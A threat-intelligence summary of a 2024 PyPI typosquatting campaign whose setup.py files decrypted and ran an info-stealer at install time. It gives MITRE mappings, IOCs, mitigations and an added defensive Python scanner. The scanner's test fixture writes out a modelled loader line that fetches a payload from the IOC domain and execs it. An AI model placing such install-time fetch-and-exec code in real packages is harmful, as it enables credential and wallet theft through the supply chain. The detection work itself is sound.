PyPI temporarily suspended new project creation and user registration after Checkmarx discovered a large typosquatting campaign that uploaded numerous malicious packages whose setup.py executed encrypted, obfuscated code at install time. The packages used Fernet encryption to hide a downloader stage that retrieved an info‑stealer targeting browser data, stored credentials and crypto wallets, and that installed persistence so the stealer survived reboots. #PyPI #Checkmarx #Fernet #funcaptcha

Keypoints

  • PyPI suspended new project creation and new user registration to mitigate an ongoing malware upload campaign.
  • Checkmarx identified multiple typosquatting packages uploaded between Mar 27–28, 2024, likely created by automation.
  • Malicious code was embedded in each package’s setup.py so it executed automatically when the package was installed.
  • setup.py contained obfuscated code encrypted with Fernet (the symmetric token scheme from the Python cryptography library); at install time it decrypted and executed that code, which in turn fetched a further encrypted payload from a remote server, decrypted it and ran it.
  • The secondary payload was an extensive info‑stealer aimed at browser cookies, extension data, crypto wallets, and stored credentials.
  • The malware implemented persistence to survive reboots and remain active after initial execution.
  • PyPI removed the suspicious projects (a long list of typosquatted names); Checkmarx’s write‑up lists IOCs including funcaptcha[.]ru URLs and file hashes.

MITRE Techniques

  • [T1195] Supply Chain Compromise – Attackers uploaded malicious packages to a public package repository so that the malware ran on every host that installed one of them (‘Between March 27 and March 28, 2024, multiple malicious Python packages were uploaded on the Python Package Index (PyPI).’)
  • [T1204] User Execution – The malicious code executed automatically during package installation through setup.py, causing users to run the payload by installing the package (‘The malicious code is located within each package’s setup.py file, enabling automatic execution upon installation.’)
  • [T1027] Obfuscated Files or Information – The installers contained obfuscated/encrypted code using the Fernet module to hide malicious logic (‘the setup.py file contained obfuscated code that was encrypted using the Fernet encryption module’)
  • [T1105] Ingress Tool Transfer – setup.py dynamically constructed a URL and retrieved an additional encrypted payload from a remote server to deliver the main info‑stealer (‘attempted to retrieve an additional payload from a remote server. The URL for the payload was dynamically constructed by appending the package name as a query parameter.’)
  • [T1539] Steal Web Session Cookie – The deployed info‑stealer targeted browser cookies and extension data to harvest sessions and credentials (‘aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc..) and various credentials.’)
  • [T1547] Boot or Logon Autostart Execution – The malware implemented a persistence mechanism to ensure it remained active after reboots (‘the malicious payload employed a persistence mechanism to survive reboots.’)

Indicators of Compromise

  • [Domain/URL] Malicious payload delivery endpoints – hxxps://funcaptcha[.]ru/paste2, hxxps://funcaptcha[.]ru/atomic/app.asar (and other funcaptcha[.]ru paths)
  • [File name] Retrieved payload / component – app.asar (an Electron application archive) referenced as a delivered artifact (funcaptcha[.]ru/atomic/app.asar)
  • [File hashes] Example payload hashes – ABE19B0964DAF24CD82C6DB59212FD7A61C4C8335DD4A32B8E55C7C05C17220D, 0C1DDD33E630F4AC684880F0E673DFA84919272494C11DA0F1EC05FB4F919CE8
  • [Package names] Typosquatting packages uploaded to PyPI – requiremetstx, misspelled variants of customtkinter, misspelled variants of tensorflow, and hundreds of other look‑alike package names

Checkmarx observed an automated typosquatting campaign that uploaded hundreds of look‑alike package names to PyPI over March 27–28, 2024. Each malicious package embedded its loader in setup.py so that installing the package triggered execution: setup.py contained Fernet‑encrypted, obfuscated code which the install process decrypted and ran. That code then built a URL by appending the package name as a query parameter, fetched a second encrypted payload from a remote server (the IOCs reference funcaptcha[.]ru paths), decrypted it, and executed an extensive info‑stealer module.

The delivered info‑stealer was designed to harvest browser data (cookies, extension storage), various stored credentials, and crypto wallet information. To maintain access the malware implemented persistence to survive reboots. PyPI removed the flagged projects (a long list of misspelled package names), and Checkmarx’s write‑up lists the funcaptcha[.]ru delivery URLs and the identified file hashes for detection and blocking.

Technical mitigations include blocking the listed domain and URLs at the network edge, inspecting the setup.py of any source distribution (sdist) before it is built for install‑time network access, dynamic exec/eval and decryption of embedded blobs, installing from wheels only (pip’s --only-binary=:all:) so that setup.py never runs, pinning exact package names and hashes (pip --require-hashes), and matching files against the listed hashes. Administrators should audit recent pip installs, remove any suspicious packages, look for persistence artifacts, and rotate any potentially exposed credentials or wallets.
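The loader pattern described above (Fernet decrypt feeding exec, a download URL built from the package name, an IOC domain string) can be triaged statically before an sdist is ever built. The following is an added example written for this page, not Checkmarx’s tooling or code from the campaign; it parses a setup.py with the ast module and tags the markers it finds. The two setup.py fixtures are constructed for the test: the key and token values are dummies and the fixtures are only parsed, never executed. The hash list and domain are the IOCs from this page.

```python
"""Static triage of setup.py for an install-time Fernet-decrypt-and-exec
loader.  Added example for this page; the fixtures are constructed."""

import ast
import hashlib
import re
from typing import Iterator, List, Set

# IOCs from the page, lower-cased for comparison.
IOC_DOMAINS = {"funcaptcha.ru"}
IOC_SHA256 = {
    "abe19b0964daf24cd82c6db59212fd7a61c4c8335dd4a32b8e55c7c05c17220d",
    "0c1ddd33e630f4ac684880f0e673dfa84919272494c11da0f1ec05fb4f919ce8",
}
# A Fernet token starts with version byte 0x80, so its base64 form starts "gAAAAA".
FERNET_TOKEN = re.compile(r"^gAAAAA[A-Za-z0-9_-]{20,}={0,2}$")
DYNAMIC_EXEC = {"exec", "eval"}
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "post"}


def _called_names(tree: ast.AST) -> Set[str]:
    """Names of every function called anywhere in the module (foo() or x.foo())."""
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name):
                names.add(fn.id)
            elif isinstance(fn, ast.Attribute):
                names.add(fn.attr)
    return names


def _string_constants(tree: ast.AST) -> Iterator[str]:
    """Every str/bytes literal in the module, bytes decoded for matching."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            v = node.value
            yield v.decode("latin-1") if isinstance(v, bytes) else v


def _builds_url(tree: ast.AST) -> bool:
    """True if a URL literal is concatenated or f-string-joined with runtime data."""
    for node in ast.walk(tree):
        parts = []
        if isinstance(node, ast.JoinedStr):
            parts = [v for v in node.values if isinstance(v, ast.Constant)]
        elif isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            parts = [n for n in (node.left, node.right) if isinstance(n, ast.Constant)]
        if any(isinstance(p.value, str) and p.value.lower().startswith(("http://", "https://"))
               for p in parts):
            return True
    return False


def triage_setup_py(source: str) -> List[str]:
    """Return sorted finding tags for one setup.py source text (empty = clean)."""
    findings = set()
    if hashlib.sha256(source.encode()).hexdigest() in IOC_SHA256:
        findings.add("ioc-hash")
    tree = ast.parse(source)
    called = _called_names(tree)
    imported = {alias.name for node in ast.walk(tree)
                if isinstance(node, (ast.Import, ast.ImportFrom)) for alias in node.names}
    uses_fernet = "Fernet" in called or any(n.endswith("fernet") or n == "Fernet" for n in imported)
    if uses_fernet and called & DYNAMIC_EXEC:
        findings.add("fernet-decrypt-exec")      # the loader pattern itself
    elif called & DYNAMIC_EXEC:
        findings.add("dynamic-exec")
    if called & FETCH_CALLS:
        findings.add("network-at-install")
    if _builds_url(tree):
        findings.add("url-built-at-runtime")     # e.g. package name appended as a query parameter
    for s in _string_constants(tree):
        if any(d in s.lower() for d in IOC_DOMAINS):
            findings.add("ioc-domain")
        if FERNET_TOKEN.match(s):
            findings.add("fernet-token-literal")
    return sorted(findings)


# Constructed fixture modelled on the described pattern; parsed only, never run.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from cryptography.fernet import Fernet
from urllib.request import urlopen
name = "requiremetstx"
key = b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
token = "gAAAAABmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
exec(Fernet(key).decrypt(token))
url = "https://funcaptcha.ru/paste2?package=" + name
exec(Fernet(key).decrypt(urlopen(url).read()))
setup(name=name, version="0.0.1")
'''

# Constructed benign fixture: an ordinary setuptools script.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="mypkg", version="1.0.0", packages=["mypkg"])
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, triage_setup_py(src))
```

To get a real setup.py without building it, fetch the sdist with `pip download --no-binary :all: --no-deps <name>`, extract the tarball and pass the file contents to triage_setup_py; any finding other than an empty list deserves a manual read before the package is allowed near a build host. The hash check is only meaningful against the exact bytes of a downloaded artifact, so compute it over the file on disk rather than a re-encoded string in production use.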

Read more: https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/